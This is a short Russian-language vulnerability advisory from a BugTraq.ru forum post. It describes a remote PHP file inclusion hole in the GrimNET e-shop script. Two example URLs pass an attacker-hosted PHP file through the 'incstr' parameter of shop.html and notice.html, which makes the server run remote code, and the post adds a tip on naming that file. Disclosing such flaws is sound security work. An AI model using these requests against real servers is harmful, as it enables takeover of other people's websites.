информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Где водятся OGRыЗа кого нас держат?Spanning Tree Protocol: недокументированное применение
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Бэкдор в xz/liblzma, предназначенный... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / site updates
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Выполнение произвольного PHP-кода в GrimNET e-shop 20.10.03 22:37  
Publisher: dl <Dmitry Leonov>
<"чистая" ссылка>
Выполнение произвольного PHP-кода в GrimNET e-shop
NivaX nivax@web-hack.ru http://www.web-hack.ru

Не представляю, насколько актуальна эта самая корейская система электронных магазинов [ http://www.grimnet.net/ ], но дырка любопытна и сама по себе.
Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.


Полный текст
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach